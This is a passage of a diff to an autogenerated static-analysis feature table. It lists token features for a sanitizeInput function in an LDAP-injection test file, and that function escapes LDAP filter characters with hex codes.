autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitiz ... 2f");\\n} | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:7:17:1 | sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:9:22 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:9:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:9:22 | this | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:9:22 | this | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:9:22 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | 'arguments' object of function sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | 'arguments' object of function sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | 'arguments' object of function sanitizeInput | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | 'arguments' object of function sanitizeInput | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | 'arguments' object of function sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | exceptional return of function sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | exceptional return of function sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | exceptional return of function sanitizeInput | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | exceptional return of function sanitizeInput | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | exceptional return of function sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | functio ... 2f");\\n} | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | functio ... 2f");\\n} | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | functio ... 2f");\\n} | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | return of function sanitizeInput | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | return of function sanitizeInput | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | return of function sanitizeInput | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | return of function sanitizeInput | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:23:17:1 | return of function sanitizeInput | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:9:33:9:37 | input | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:10:14 | input | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:10:14 | input | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:10:14 | input | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:10:14 | input | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:10:14 | input | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:12 | input\\n .replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:12 | input\\n .replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:12 | input\\n .replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:12 | input\\n .replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:12 | input\\n .replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | exceptional return of input\\n ... "\\\\2a") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | exceptional return of input\\n ... "\\\\2a") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | exceptional return of input\\n ... "\\\\2a") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | exceptional return of input\\n ... "\\\\2a") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | exceptional return of input\\n ... "\\\\2a") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | input\\n ... "\\\\2a") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | input\\n ... "\\\\2a") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | input\\n ... "\\\\2a") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | input\\n ... "\\\\2a") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:11:27 | input\\n ... "\\\\2a") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:12 | input\\n ... replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:12 | input\\n ... replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:12 | input\\n ... replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:12 | input\\n ... replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:12 | input\\n ... replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | exceptional return of input\\n ... "\\\\28") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | exceptional return of input\\n ... "\\\\28") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | exceptional return of input\\n ... "\\\\28") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | exceptional return of input\\n ... "\\\\28") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | exceptional return of input\\n ... "\\\\28") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | input\\n ... "\\\\28") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | input\\n ... "\\\\28") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | input\\n ... "\\\\28") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | input\\n ... "\\\\28") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:12:27 | input\\n ... "\\\\28") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:12 | input\\n ... replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:12 | input\\n ... replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:12 | input\\n ... replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:12 | input\\n ... replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:12 | input\\n ... replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | exceptional return of input\\n ... "\\\\29") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | exceptional return of input\\n ... "\\\\29") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | exceptional return of input\\n ... "\\\\29") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | exceptional return of input\\n ... "\\\\29") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | exceptional return of input\\n ... "\\\\29") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | input\\n ... "\\\\29") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | input\\n ... "\\\\29") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | input\\n ... "\\\\29") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | input\\n ... "\\\\29") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:13:27 | input\\n ... "\\\\29") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:12 | input\\n ... replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:12 | input\\n ... replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:12 | input\\n ... replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:12 | input\\n ... replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:12 | input\\n ... replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | exceptional return of input\\n ... "\\\\5c") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | exceptional return of input\\n ... "\\\\5c") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | exceptional return of input\\n ... "\\\\5c") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | exceptional return of input\\n ... "\\\\5c") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | exceptional return of input\\n ... "\\\\5c") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | input\\n ... "\\\\5c") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | input\\n ... "\\\\5c") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | input\\n ... "\\\\5c") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | input\\n ... "\\\\5c") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:14:27 | input\\n ... "\\\\5c") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:12 | input\\n ... replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:12 | input\\n ... replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:12 | input\\n ... replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:12 | input\\n ... replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:12 | input\\n ... replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | exceptional return of input\\n ... "\\\\00") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | exceptional return of input\\n ... "\\\\00") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | exceptional return of input\\n ... "\\\\00") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | exceptional return of input\\n ... "\\\\00") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | exceptional return of input\\n ... "\\\\00") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | input\\n ... "\\\\00") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | input\\n ... "\\\\00") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | input\\n ... "\\\\00") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | input\\n ... "\\\\00") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:15:27 | input\\n ... "\\\\00") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:12 | input\\n ... replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:12 | input\\n ... replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:12 | input\\n ... replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:12 | input\\n ... replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:12 | input\\n ... replace | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | exceptional return of input\\n ... "\\\\2f") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | exceptional return of input\\n ... "\\\\2f") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | exceptional return of input\\n ... "\\\\2f") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | exceptional return of input\\n ... "\\\\2f") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | exceptional return of input\\n ... "\\\\2f") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | input\\n ... "\\\\2f") | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | input\\n ... "\\\\2f") | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | input\\n ... "\\\\2f") | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | input\\n ... "\\\\2f") | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:10:10:16:27 | input\\n ... "\\\\2f") | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:6:11:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:6:11:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:6:11:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:6:11:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:6:11:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:14:11:18 | /\\*/g | CalleeFlexibleAccessPath | input.replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:14:11:18 | /\\*/g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:14:11:18 | /\\*/g | contextFunctionInterfaces | sanitizeInput(input) | @@ -895,6 +5101,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:21:11:26 | "\\\\2a" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:21:11:26 | "\\\\2a" | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:11:21:11:26 | "\\\\2a" | receiverName | input | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:6:12:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:6:12:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:6:12:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:6:12:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:6:12:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:14:12:18 | /\\(/g | CalleeFlexibleAccessPath | input.replace().replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:14:12:18 | /\\(/g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:14:12:18 | /\\(/g | contextFunctionInterfaces | sanitizeInput(input) | @@ -909,6 +5120,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:21:12:26 | "\\\\28" | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:21:12:26 | "\\\\28" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:12:21:12:26 | "\\\\28" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:6:13:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:6:13:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:6:13:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:6:13:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:6:13:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:14:13:18 | /\\)/g | CalleeFlexibleAccessPath | input.replace().replace().replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:14:13:18 | /\\)/g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:14:13:18 | /\\)/g | contextFunctionInterfaces | sanitizeInput(input) | @@ -923,6 +5139,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:21:13:26 | "\\\\29" | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:21:13:26 | "\\\\29" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:13:21:13:26 | "\\\\29" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:6:14:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:6:14:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:6:14:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:6:14:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:6:14:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:14:14:18 | /\\\\/g | CalleeFlexibleAccessPath | input.replace().replace().replace().replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:14:14:18 | /\\\\/g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:14:14:18 | /\\\\/g | contextFunctionInterfaces | sanitizeInput(input) | @@ -937,6 +5158,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:21:14:26 | "\\\\5c" | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:21:14:26 | "\\\\5c" | enclosingFunctionName | sanitizeInput | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:14:21:14:26 | "\\\\5c" | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:6:15:12 | replace | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:6:15:12 | replace | contextSurroundingFunctionParameters | (input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:6:15:12 | replace | enclosingFunctionBody | input input replace /\\*/g \\2a replace /\\(/g \\28 replace /\\)/g \\29 replace /\\\\/g \\5c replace /\\0/g \\00 replace /\\//g \\2f | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:6:15:12 | replace | enclosingFunctionName | sanitizeInput | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:6:15:12 | replace | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:14:15:18 | /\\0/g | CalleeFlexibleAccessPath | input.replace().replace().replace().replace().replace | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:14:15:18 | /\\0/g | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:14:15:18 | /\\0/g | contextFunctionInterfaces | sanitizeInput(input) | @@ -951,6 +5177,11 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:15:21:15:26 | "\\\\00" | 